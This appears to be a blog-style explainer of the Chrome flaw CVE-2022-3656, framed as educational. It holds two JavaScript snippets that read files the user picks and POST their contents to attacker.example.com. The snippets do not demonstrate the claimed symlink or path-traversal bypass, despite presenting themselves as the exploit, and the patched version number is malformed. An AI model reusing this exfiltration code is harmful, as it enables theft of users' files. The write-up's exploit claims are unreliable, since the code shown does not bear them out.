CVE-2022-3656 - Cracking Google Chrome’s File System Privacy with Insufficient Data Validation

Overview  
In October 2022, a security flaw (CVE-2022-3656) was flagged and patched in Google Chrome. This vulnerability, if properly exploited, allowed a malicious website to bypass Chrome’s file system restrictions. Here, we’ll break down what happened, how it worked, and share exploit details—with code snippets—for educational purposes only.

What Was the Issue?

Google Chrome protects your files using the File System Access API. Basically, when a website wants to access your local files, Chrome should vet that request thoroughly—ensuring the site can’t snoop around or trick you into sharing something sensitive.

With CVE-2022-3656, Chrome failed to check file access requests strictly enough. A remote attacker could use a crafted HTML page to bypass Chrome’s security measures and potentially steal files you thought were safe.

> Severity: Medium  
> Fixed in: Chrome 107..5304.62  
> Official reference: Chromium Issue 1366182

Insufficient Validation:

Chrome did not strictly validate file paths and file types when a site requested file access via the File System API.

Crafted HTML Payload:

An attacker could make an HTML page that requests specific files (say, your passwords or crypto wallet data).

User Interaction:

If the user trusted the site and granted access (sometimes via social engineering), the malicious site could access more files than intended.

Step 1. Basic Exploit HTML

This snippet tries to access local files via a hidden HTML form and sneaky JavaScript.

<!DOCTYPE html>
<html>
  <body>
    <button id="steal">Steal My Files</button>

    <script>
      document.getElementById('steal').onclick = async function() {
        try {
          // Request a file handle
          const [fileHandle] = await window.showOpenFilePicker({
            // Attacker tricks user into picking a sensitive directory/file
            multiple: false
          });

          const file = await fileHandle.getFile();
          const text = await file.text();

          // Attacker could send file contents to their server
          fetch('https://attacker.example.com/steal';, {
            method: 'POST',
            body: JSON.stringify({data:text}),
            headers: {'Content-Type': 'application/json'}
          });

          alert('Thanks for your file!');
        } catch(e) {
          alert('Failed: ' + e);
        }
      };
    </script>
  </body>
</html>

What’s happening?

The attacker’s site uses showOpenFilePicker() from the File System Access API.

- A user is tricked into selecting a file (maybe through social engineering, e.g., "Upload your wallet backup to claim your prize!").

Step 2. Bypassing Restrictions

Due to the insufficient validation in Chrome, attackers could sometimes piggy-back off symbolic links (symlinks) or use relative file paths to try to sneak access to files outside the designated safe folder.

// Trick: Leverage symlinks or path traversal
const fileHandle = await window.showDirectoryPicker();
for await (const [name, handle] of fileHandle.entries()) {
  if (handle.kind === 'file') {
    const file = await handle.getFile();
    const contents = await file.text();
    // Send stolen content to attacker
    fetch('https://attacker.example.com/steal';, {
      method: 'POST',
      body: JSON.stringify({file: name, contents: contents}),
      headers: {'Content-Type': 'application/json'}
    });
  }
}

How Was It Fixed?

The Chrome team improved validation for file access via the File System Access API. Chrome now more rigorously checks where files come from and doesn’t trust relative paths or symlinks that could be abused.

Patched in: Chrome 107..5304.62

- Fixed Commit: Chromium Commit
- Security Report Acknowledgements: Chrome Releases Blog

References

- Chromium Bug 1366182
- CVE-2022-3656 on NIST NVD
- Chrome Release Notes (Oct 2022)

Final Word

CVE-2022-3656 offers a clear example of why even "medium" browser bugs matter. A small validation oversight in Chrome’s file system features created a window of opportunity for web-based attacks, especially through social engineering. If you build for the web, double-check how your front-end code processes files. If you browse, keep your browser fresh and always be wary of sites that want files from you.

> Exclusive takeaway: File System Access can make websites slick and powerful, but every API for user files is also a risk. This vulnerability is a reminder to treat file prompts online as seriously as you would a stranger asking for your house keys.

Timeline

Published on: 11/01/2022 23:15:00 UTC
Last modified on: 11/10/2022 00:15:00 UTC